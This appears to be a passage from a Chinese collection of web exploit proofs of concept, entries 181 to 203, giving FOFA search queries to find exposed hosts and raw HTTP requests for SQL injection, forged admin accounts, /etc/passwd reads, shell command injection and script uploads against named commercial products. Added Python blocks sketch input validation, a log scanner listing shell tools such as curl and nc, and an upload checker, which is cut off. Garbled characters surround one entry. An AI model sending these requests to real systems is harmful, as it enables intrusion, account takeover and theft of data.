Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技企业标准化管理系统 AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创图书馆集群管理系统 updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼应用虚拟化系统 SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会视频会议 attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

The poi parameter is fetched server-side as a URL, so the file:// scheme reads local files.

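Entries 188 and 190 both pass a client-controlled string straight into a file read (a filesystem path in 188, a file:// URL in 190). The following is an added example, not code from the original post or from either vendor: each unsafe pattern next to a hardened replacement. The attachment root, the host allow-list and the function names are assumptions for the demo.

```python
import os
from urllib.parse import urlsplit

# Assumed upload directory for an entry-188 style "?file=" handler.
ATTACH_ROOT = "/srv/app/attachments"
# Assumed allow-list of upstream hosts for an entry-190 style "poi=" fetch.
ALLOWED_HOSTS = {"api.example.com"}


def open_attachment_unsafe(user_path: str) -> str:
    """The pattern behind entry 188: the parameter is treated as a path.

    os.path.join() discards ATTACH_ROOT when user_path is absolute, and
    '../' segments are not normalised away, so /etc/passwd is reachable.
    """
    return os.path.join(ATTACH_ROOT, user_path)


def resolve_attachment(user_path: str, root: str = ATTACH_ROOT) -> str:
    """Map a client-supplied attachment name to a path guaranteed to sit under root."""
    # Accept only a bare file name: no separators of either flavour, no '.' or '..'.
    normalised = user_path.replace("\\", "/")
    if (not normalised or normalised in (".", "..")
            or os.path.basename(normalised) != normalised):
        raise ValueError("attachment name must be a bare file name")
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, normalised))
    # Belt and braces: a symlink inside root must not point outside it.
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise ValueError("attachment path escapes root")
    return candidate


def fetch_url_unsafe(poi: str) -> str:
    """The pattern behind entry 190: any scheme, file:// included, goes to the URL opener."""
    return poi


def validate_fetch_url(poi: str) -> str:
    """Allow only http(s) URLs to allow-listed hosts; rejects file:// and internal targets."""
    parts = urlsplit(poi)
    if parts.scheme.lower() not in ("http", "https"):
        raise ValueError(f"scheme {parts.scheme!r} is not allowed")
    host = (parts.hostname or "").lower()       # hostname, not netloc: strips user@ and :port
    if host not in ALLOWED_HOSTS:
        raise ValueError(f"host {host!r} is not on the allow-list")
    if parts.username or parts.password:
        raise ValueError("credentials in URL are not allowed")
    return poi


def rejected(func, value) -> bool:
    """True when func refuses value with ValueError (used by the checks below)."""
    try:
        func(value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("unsafe join:", open_attachment_unsafe("/etc/passwd"))
    print("hardened:", rejected(resolve_attachment, "../../etc/passwd"))
    print("file:// rejected:", rejected(validate_fetch_url, "file:///etc/passwd"))
```

The allow-list of hosts is what does the work in `validate_fetch_url`; a scheme check alone still leaves http://127.0.0.1 and other internal targets reachable.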
191. 亿赛通电子文档安全管理系统 (ESAFENET electronic document security management system) NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

Check: a vulnerable host delays the response by about 5 seconds.

192. 富通天下外贸ERP (Futong Tianxia foreign-trade ERP) UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
The stored file takes its extension from the name query parameter, so name=.ashx turns the request body into an ASP.NET handler.
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<%@ WebHandler Language="C#" Class="AverageHandler" %>
using System;
using System.Web;

public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    {
        get { return true; }
    }

    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科云鉴安全管理系统 (Hillstone Networks Yunjian security management system) setSystemTimeAction command execution
FOFA:body="山石云鉴主机安全管理系统"
Step 1: obtain a CSRF token.
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host: your-ip
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

Step 2: substitute the token for {{token}}; the param value carries a Python os.system() call that writes a marker file under the web root.
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

Step 3: read back the file written in step 2; a vulnerable host returns 23333333333456.
GET /master/img/config HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 (FE enterprise operations management platform) uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星上网行为管理系统 (Volans internet behaviour management system) send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

The name field is passed to a shell; a vulnerable host returns the uname -a output.

; J% N2 k, a1 |, b6 r  X1 J+ I196. 河南省风速科技统一认证平台密码重置5 O8 F# [) a2 W
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"* {% P& U% u/ P  ?
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
+ U  Z* E9 m; I) ]% a0 I9 }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+ Q* U8 b# T1 rContent-Type: application/json;charset=UTF-8
1 A; z" r9 h: F: _X-Requested-With: XMLHttpRequest1 [( T4 Q) {+ w& `( f
Host:
$ W4 G% e: ~: w! sAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2/ \( K7 V6 X$ O7 ~
Content-Length: 45/ H% F1 N7 _% ^7 q8 `' B* v
Connection: close
! d6 M* |& {6 Q9 \" N
4 Y: ]) B+ X0 Z& ]# X( B{"xgh":"test","newPass":"test666","email":""}7 d2 s2 O. E  K% C

9 O( @# e: C3 X: G
- z/ D" S1 C- ^& F( c8 m9 R. E" u7 d6 G
197. 浙大恩特客户资源管理系统 (Zheda Enter customer resource management system) Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

Check: a vulnerable host returns 12321 (the product 111*111) in the response.

198. 阿里云盘 WebDAV (aliyundrive-webdav LuCI app) command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

The sid value decodes to `ls />/www/aaa.txt` (a backtick-quoted shell command), so a vulnerable host then serves the directory listing at /aaa.txt. The request needs a valid sysauth session cookie.

199. Cockpit CMS assetsmanager/upload endpoint file upload
FOFA:title="Authenticate Please!"

1. Fetch the login page to obtain the csfr token (the upload in step 3 needs the session cookie from step 2):
GET /auth/login?to=/ HTTP/1.1

Response: 200; the body contains csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the token from step 1, together with credentials (the PoC uses admin/admin), to obtain a session cookie:
POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload with the session cookie:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

The uploaded file is then reachable at /storage/uploads/tttt.php

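Entry 199 is a three-request chain (token, then session cookie, then upload), and entry 193 has the same token-then-action shape. The following is an added example, not the original post's or Cockpit's code: a driver for the first two steps of entry 199 with a pluggable transport, so a defender can confirm whether an instance still accepts the default credentials without dropping a file on it. The fake transport replays the two responses quoted above; `make_fake_send`, `accepts_default_credentials` and the Response/Send types are the example's own names.

```python
import json
import re
from typing import Callable, Dict, Tuple

# (status, headers, body): the minimal view of an HTTP response the chain needs.
Response = Tuple[int, Dict[str, str], str]
# A transport: send(method, path, headers, body) -> Response. A real run plugs an
# HTTP client in here; the demo uses make_fake_send() below.
Send = Callable[[str, str, Dict[str, str], str], Response]

CSFR_RE = re.compile(r'csfr:"([A-Za-z0-9_.\-]+)"')   # as printed in the /auth/login page
SESSION_RE = re.compile(r"mysession=([0-9a-f]+)")     # from the Set-Cookie header


def fetch_csfr(send: Send) -> str:
    """Step 1: read the csfr token out of the login page."""
    status, _headers, body = send("GET", "/auth/login?to=/", {}, "")
    match = CSFR_RE.search(body)
    if status != 200 or match is None:
        raise RuntimeError("csfr token not found on login page")
    return match.group(1)


def login(send: Send, csfr: str, user: str, password: str) -> str:
    """Step 2: exchange credentials plus token for the mysession cookie value."""
    body = json.dumps({"auth": {"user": user, "password": password}, "csfr": csfr})
    status, headers, _body = send("POST", "/auth/check",
                                  {"Content-Type": "application/json"}, body)
    match = SESSION_RE.search(headers.get("Set-Cookie", ""))
    if status != 200 or match is None:
        raise RuntimeError("login rejected")
    return match.group(1)


def accepts_default_credentials(send: Send, user: str = "admin", password: str = "admin") -> bool:
    """Defender's check: stop after step 2. Nothing is uploaded; True means the
    instance is exposed to the upload in step 3 shown above."""
    try:
        login(send, fetch_csfr(send), user, password)
    except RuntimeError:
        return False
    return True


# Constructed stand-in for a target, replaying the two responses quoted in the post.
TOKEN = ("eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9."
         "eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw")
SESSION = "95524f01e238bf51bb60d77ede3bea92"


def make_fake_send(default_creds_valid: bool) -> Send:
    """Fake transport; default_creds_valid=False models a host whose password was changed."""
    def send(method: str, path: str, headers: Dict[str, str], body: str) -> Response:
        if method == "GET" and path.startswith("/auth/login"):
            return 200, {}, 'csfr:"%s"' % TOKEN
        if method == "POST" and path == "/auth/check":
            request = json.loads(body)
            ok = (default_creds_valid and request.get("csfr") == TOKEN
                  and request.get("auth") == {"user": "admin", "password": "admin"})
            if ok:
                return 200, {"Set-Cookie": "mysession=%s; path=/" % SESSION}, ""
            return 401, {}, ""
        return 404, {}, ""
    return send


if __name__ == "__main__":
    print("default credentials accepted:", accepts_default_credentials(make_fake_send(True)))
```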
200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

Check: a vulnerable host delays the response by about 5 seconds.

201. 方正全媒体新闻采编系统 (Founder all-media news editing system) binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

Check: the TableName value is concatenated into the query (stacked MSSQL WAITFOR DELAY); a vulnerable host delays the response by about 5 seconds.

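Most SQL injection entries in this list (the RANDOMBLOB payload at the top of this section, 187, 189, 191, 197, 200, 201) rely on a few time-based or UNION primitives, and the command-injection entries (193, 195, 198) on a handful of shell and Python constructs, which makes them cheap to hunt for in web-server or WAF logs. The following is an added example, not part of the original post: a signature scanner run over constructed requests that mirror the PoCs above. The signature names and the sample requests are the example's own; POST bodies are only visible if your proxy or WAF logs them.

```python
import re
from urllib.parse import unquote_plus

# Signatures distilled from the PoCs above. All matching is done after
# URL-decoding and case-insensitively; the comment names the entries each one covers.
SIGNATURES = [
    ("sqli-mysql-sleep", re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I)),            # 187, 200
    ("sqli-mssql-waitfor", re.compile(r"\bwaitfor\s+delay\s+'", re.I)),            # 189, 191, 201
    ("sqli-sqlite-randomblob", re.compile(r"\brandomblob\s*\(", re.I)),            # RANDOMBLOB payload
    ("sqli-union", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),            # 197, 201
    ("cmdi-python-eval", re.compile(r"\bos\.system\s*\(|\b__import__\s*\(", re.I)),  # 193
    ("cmdi-shell-meta", re.compile(
        r"[;|]\s*(?:uname|id|whoami|cat|ls|echo|wget|curl|bash|sh|nc)\b", re.I)),   # 195
    ("cmdi-backtick", re.compile(r"`[^`]{1,200}`")),                                 # 198
]


def decode_twice(value: str) -> str:
    """URL-decode twice: the PoCs are percent-encoded (%60 is the backtick in
    entry 198) and double encoding is a common filter bypass."""
    return unquote_plus(unquote_plus(value))


def scan_request(method: str, target: str, body: str = "") -> list:
    """Labels of every signature that fires on one request (query string and body)."""
    haystack = decode_twice(target) + "\n" + decode_twice(body)
    return [label for label, rx in SIGNATURES if rx.search(haystack)]


def scan_requests(requests) -> list:
    """Run scan_request over (method, target, body) tuples; return (index, labels) for hits."""
    hits = []
    for index, (method, target, body) in enumerate(requests):
        labels = scan_request(method, target, body)
        if labels:
            hits.append((index, labels))
    return hits


# Constructed requests mirroring the PoCs above; the last one is benign traffic.
SAMPLE_REQUESTS = [
    ("GET", "/xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27--", ""),
    ("POST", "/index.cfm/_api/json/v1/default/?method=processAsyncObject",
     "object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1"),
    ("GET", "/cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid="
            "%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20", ""),
    ("POST", "/send_order.cgi?parameter=operation",
     '{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}'),
    ("POST", "/master/ajaxActions/setSystemTimeAction.php?token_csrf=abc",
     "param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')"),
    ("GET", "/entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist", ""),
    ("GET", "/xds/deleteStudy.php?documentUniqueId=12345", ""),
]


if __name__ == "__main__":
    for index, labels in scan_requests(SAMPLE_REQUESTS):
        print(index, SAMPLE_REQUESTS[index][1][:60], labels)
```

The shell-metacharacter rule deliberately requires a command name after the `;` or `|`; matching bare metacharacters would also flag the stacked `';` in the SQL payloads and ordinary `a=b;c=d` query strings.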
202. 微擎系统 (WeEngine) AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Step 1: fetch the page to obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Step 2: substitute the __VIEWSTATE and __EVENTVALIDATION values into the upload request:
POST /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

The uploaded file is then reachable at /_data/Uploads/1123.txt

203. 红海云EHR (Redsea eHR) PtFjk file upload
FOFA:body="RedseaPlatform"
The part declares Content-Type image/jpeg but carries JSP; the handler stores it under the client-supplied .jsp name.
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--

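Entries 192, 194, 199, 202 and 203 are all upload handlers that trust something the client controls: the extension from a query parameter (192), a filename containing ../ (194), a script body behind an image Content-Type (203), or simply any extension at all (199, 202). The following is an added example, not code from the original post or from any of these vendors: a multipart/form-data checker built on the standard-library email parser that rejects each of those tricks, plus a server-side naming rule that never lets the client choose the stored extension. The allow-lists, field names and sample bodies are constructed for the demo (two of the bodies mirror the PoCs for entries 194 and 203).

```python
import email
import os
import re
import uuid
from email import policy

# Assumed storage policy for the demo: what the application is willing to keep.
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".pdf", ".txt"}
# Extensions the servers behind entries 192, 194, 199, 202 and 203 would execute.
SCRIPT_EXT = {".jsp", ".jspx", ".php", ".phtml", ".ashx", ".asp", ".aspx", ".war"}
IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG", b"GIF8")       # JPEG, PNG, GIF headers
SCRIPT_MARKER = re.compile(rb"<\?php|<\?=|<%")               # PHP / JSP / ASP.NET openers


def choose_stored_name(client_name: str) -> str:
    """Server-side name for a stored file: random stem plus a validated extension.

    Entry 192 takes the extension from a separate ?name=.ashx parameter; the
    rule here is that the client never picks the stored name or extension.
    """
    normalised = client_name.replace("\\", "/")
    if os.path.basename(normalised) != normalised:
        raise ValueError(f"path separators in file name {client_name!r}")
    pieces = normalised.lower().split(".")
    if len(pieces) < 2 or not pieces[0]:                   # no extension, or a dot-file like ".ashx"
        raise ValueError(f"no usable extension in {client_name!r}")
    ext = "." + pieces[-1]
    if ext not in ALLOWED_EXT:
        raise ValueError(f"extension {ext!r} is not allowed")
    if any("." + piece in SCRIPT_EXT for piece in pieces[1:-1]):   # shell.php.jpg
        raise ValueError(f"double extension in {client_name!r}")
    return uuid.uuid4().hex + ext


def is_rejected(client_name: str) -> bool:
    """True when choose_stored_name() refuses client_name."""
    try:
        choose_stored_name(client_name)
    except ValueError:
        return True
    return False


def parse_multipart(content_type: str, body: bytes):
    """Yield (field, filename, declared_type, payload) for each file part of a form."""
    raw = b"Content-Type: " + content_type.encode("ascii") + b"\r\n\r\n" + body
    message = email.message_from_bytes(raw, policy=policy.HTTP)
    for part in message.iter_parts():
        filename = part.get_filename()
        if filename is None:
            continue                                       # plain field, e.g. "json" in entry 194
        field = part.get_param("name", header="content-disposition")
        yield field, filename, part.get_content_type(), part.get_payload(decode=True)


def check_upload(content_type: str, body: bytes) -> list:
    """Reasons to reject a multipart upload; an empty list means accept."""
    findings = []
    for field, filename, declared, payload in parse_multipart(content_type, body):
        normalised = filename.replace("\\", "/")
        if os.path.basename(normalised) != normalised:                      # entry 194
            findings.append(f"{field}: traversal in filename {filename!r}")
        try:
            choose_stored_name(os.path.basename(normalised))                # entries 199, 202, 203
        except ValueError as exc:
            findings.append(f"{field}: {exc}")
        if declared.startswith("image/") and not payload.startswith(IMAGE_MAGIC):   # entry 203
            findings.append(f"{field}: declared {declared} but content is not an image")
        if SCRIPT_MARKER.search(payload):
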